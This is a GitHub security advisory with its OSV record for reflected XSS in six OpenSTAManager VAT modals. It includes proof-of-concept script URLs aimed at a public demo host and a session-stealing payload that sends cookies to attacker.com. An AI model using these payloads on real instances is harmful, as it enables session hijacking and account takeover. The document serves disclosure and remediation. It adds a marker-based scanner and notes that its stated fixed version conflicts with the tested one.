GHSA-JFGP-G7X7-J25J
Vulnerability from github – Published: 2026-03-03 17:39 – Updated: 2026-03-04 01:59
Summary
Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow an unauthenticated attacker to execute arbitrary JavaScript in the browser of an authenticated user who opens a crafted URL, potentially leading to session hijacking, credential theft, and unauthorized actions performed as that user. Note that the OSV record reproduced further down lists 2.9.8 as the fixed version, which conflicts with the advisory text testing v2.9.8 itself; confirm the patched release against the upstream GitHub advisory before treating any version as safe.
Vulnerable Parameter: righe (GET)
Details
OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in the VAT-modification modals (modifica_iva.php) of the contract, quote, invoice, delivery-note, order and intervention modules. The application fails to HTML-encode user-supplied input from the righe GET parameter before reflecting it in HTML output.
Vulnerable Code Location:
File: /modules/contratti/modals/modifica_iva.php (Line 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
The $_GET['righe'] value is echoed directly into the HTML value attribute without output encoding (htmlspecialchars() or an equivalent). A value that begins with "> closes the attribute and the input tag, so everything that follows is parsed as markup, which lets an attacker inject arbitrary HTML/JavaScript.
All Affected Files:
1. /modules/contratti/modals/modifica_iva.php - Line 125, Line 167
2. /modules/preventivi/modals/modifica_iva.php - Line 125, Line 167
3. /modules/fatture/modals/modifica_iva.php - Line 121, Line 161
4. /modules/ddt/modals/modifica_iva.php - Line 125, Line 167
5. /modules/ordini/modals/modifica_iva.php - Line 125, Line 167
6. /modules/interventi/modals/modifica_iva.php - Line 125, Line 167
PoC
Prerequisites:
- Running instance of OpenSTAManager v2.9.8
- Valid admin credentials (username: admin, password: admin for test instance)
Step 1: Login
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Step 2: Trigger XSS
Navigate to the following URL in a browser (or use curl with the cookies saved in Step 1):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
Tested URLs (All vulnerable):
- https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
- https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
- https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
- https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
- https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
- https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
Expected Result: JavaScript alert popup displays showing the current session cookie, confirming code execution.
HTML Output (verified on live instance):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verification: two screenshots (the reflected markup and the resulting popup) accompany the original advisory and are not reproduced here.
Alternative Payloads:
Session stealing: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Impact
Affected Users: All authenticated users with access to the contracts, quotes, invoices, delivery notes (ddt), orders, or interventions modules.
Attack Scenario:
1. Attacker crafts a malicious URL with the XSS payload.
2. Attacker sends the URL to the victim via email, chat, or phishing.
3. Victim (an authenticated user) opens the link.
4. The malicious JavaScript executes in the victim's browser within the application's origin.
5. Attacker can:
- Steal session cookies → full account takeover (only if the session cookie is not flagged HttpOnly; with HttpOnly set, document.cookie is empty, but the script can still drive the session from inside the victim's browser)
- Perform actions on behalf of the victim (create/modify/delete records)
- Read CSRF tokens from the page and bypass CSRF protection
- Redirect to a phishing page
- Inject a keylogger to capture sensitive data
- Modify page content to trick the user into revealing credentials
Recommended Fix:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Apply this fix to all affected files listed in Details section.
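A repeatable check for the six reflection points and for the fix, added here as an example (it is not part of the advisory or of OpenSTAManager). It assumes the module paths listed under Details, an injected fetch callable so it can run offline, and a PHP-style session cookie name for live use; the response bodies at the bottom are constructed from the HTML output shown in the PoC and from what the recommended htmlspecialchars() fix would emit for the same input. A non-script marker is used instead of alert() because the question is whether the input is encoded, not whether a popup appears.

```python
"""Probe the `righe` reflection in each modifica_iva.php modal and tell a raw
(vulnerable) reflection apart from an HTML-encoded (fixed) one.

Added example, not code from the advisory or from OpenSTAManager. It assumes
the six module paths listed in the advisory; the sample bodies at the bottom
are constructed, not captured.
"""
import html
import re
import urllib.request
from urllib.parse import quote

MODULES = ("contratti", "preventivi", "fatture", "ddt", "ordini", "interventi")

# A unique marker keeps the probe harmless and easy to spot in the response;
# the leading "> is the part that closes value="..." and the <input> tag.
MARKER = "osmprobe7h1q"
PAYLOAD = f'"><{MARKER}>'
# What htmlspecialchars($v, ENT_QUOTES, 'UTF-8') emits for PAYLOAD:
# '&quot;&gt;&lt;osmprobe7h1q&gt;'
ENCODED = html.escape(PAYLOAD, quote=True)

INPUT_RE = re.compile(r'<input\b[^>]*\bname="righe"[^>]*\bvalue="([^"]*)"', re.I)


def probe_urls(base: str) -> list:
    """One probe URL per affected modal. The payload is percent-encoded so the
    client sends exactly the bytes PHP will place in $_GET['righe']."""
    base = base.rstrip("/")
    q = quote(PAYLOAD, safe="")
    return [f"{base}/modules/{m}/modals/modifica_iva.php?righe={q}" for m in MODULES]


def classify(body: str) -> str:
    """'vulnerable' if the raw payload escaped the value attribute,
    'encoded' if it came back as entities inside the attribute,
    'absent' if the page did not reflect it at all (e.g. a login redirect)."""
    m = INPUT_RE.search(body)
    if m and m.group(1) == ENCODED:
        return "encoded"        # attribute intact, payload neutralised
    if PAYLOAD in body:
        return "vulnerable"     # '"><' reached the HTML parser unencoded
    return "absent"


def scan(base: str, fetch) -> dict:
    """Run every probe through fetch(url) -> str and map URL -> verdict.
    fetch is injected so the scan can be exercised offline."""
    return {url: classify(fetch(url)) for url in probe_urls(base)}


def http_fetch(url: str, cookie: str = "", timeout: int = 10) -> str:
    """Plain urllib fetch for a live test instance. Pass the session cookie
    saved by the Step 1 login; the name PHPSESSID is an assumption."""
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed responses: the first mirrors the HTML output quoted in the PoC
# (marker in place of the alert payload), the second is what the recommended
# htmlspecialchars(..., ENT_QUOTES, 'UTF-8') fix produces for the same input.
VULNERABLE_BODY = f'<input type="hidden" name="righe" value="{PAYLOAD}">'
FIXED_BODY = f'<input type="hidden" name="righe" value="{ENCODED}">'


if __name__ == "__main__":
    # Offline demonstration; replace the lambda with
    # lambda u: http_fetch(u, cookie="PHPSESSID=...") against a test instance.
    for url, verdict in scan("http://localhost:8081", lambda u: VULNERABLE_BODY).items():
        print(verdict, url)
    print(classify(FIXED_BODY))
```

Running the scan before and after applying the fix to all six files should move every URL from vulnerable to encoded; an absent verdict usually means the request was redirected to the login page, so check the cookie before concluding that an endpoint is not affected.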
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24415"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T17:39:00Z",
"nvd_published_at": "2026-03-03T22:16:28Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users\u0027 browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)\n\n### Details\n\nOpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.\n\n**Vulnerable Code Location:**\nFile: `/modules/contratti/modals/modifica_iva.php` (Line 125)\n\n```php\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\u003c?php echo $_GET[\u0027righe\u0027]; ?\u003e\"\u003e\n```\n\nThe `$_GET[\u0027righe\u0027]` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.\n\n**All Affected Files:**\n\n1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**\n2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**\n3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**\n4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**\n5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**\n6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**\n\n### PoC\n\n**Prerequisites:**\n- Running instance of OpenSTAManager v2.9.8\n- Valid admin credentials (username: admin, password: admin for test instance)\n\n**Step 1: Login**\n```bash\ncurl -c cookies.txt -X POST \u0027http://localhost:8081/index.php?op=login\u0027 \\\n -d \u0027username=admin\u0026password=admin\u0027\n```\n\n**Step 2: Trigger XSS**\nNavigate to the following URL in a browser (or use curl with cookies):\n```\nhttp://localhost:8081/modules/contratti/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e\n```\n\n**Tested URLs (All vulnerable):**\n- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n\n**Expected Result:**\nJavaScript alert popup displays showing the current session cookie, confirming code execution.\n\n**HTML Output (verified on live instance):**\n```html\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"\u003e\n```\n\n**Verification:**\n\n\u003cimg width=\"1260\" height=\"99\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473\" /\u003e\n\n\u003cimg width=\"2060\" height=\"1180\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0\" /\u003e\n\n**Alternative Payloads:**\nSession stealing: `\"\u003e\u003cscript\u003efetch(\u0027https://attacker.com/?c=\u0027+document.cookie)\u003c/script\u003e`\n\n### Impact\n\n\n**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.\n\n**Attack Scenario:**\n1. Attacker crafts malicious URL with XSS payload\n2. Attacker sends URL to victim via email/chat/phishing\n3. Victim (authenticated user) clicks the link\n4. Malicious JavaScript executes in victim\u0027s browser context\n5. Attacker can:\n - Steal session cookies \u2192 Full account takeover\n - Perform actions on behalf of victim (create/modify/delete records)\n - Steal CSRF tokens and bypass CSRF protection\n - Redirect to phishing page\n - Inject keylogger to capture sensitive data\n - Modify page content to trick user into revealing credentials\n\n\n**Recommended Fix:**\n```php\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\u003c?php echo htmlspecialchars($_GET[\u0027righe\u0027], ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\n```\n\nApply this fix to all affected files listed in Details section.",
"id": "GHSA-jfgp-g7x7-j25j",
"modified": "2026-03-04T01:59:55Z",
"published": "2026-03-03T17:39:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter"
}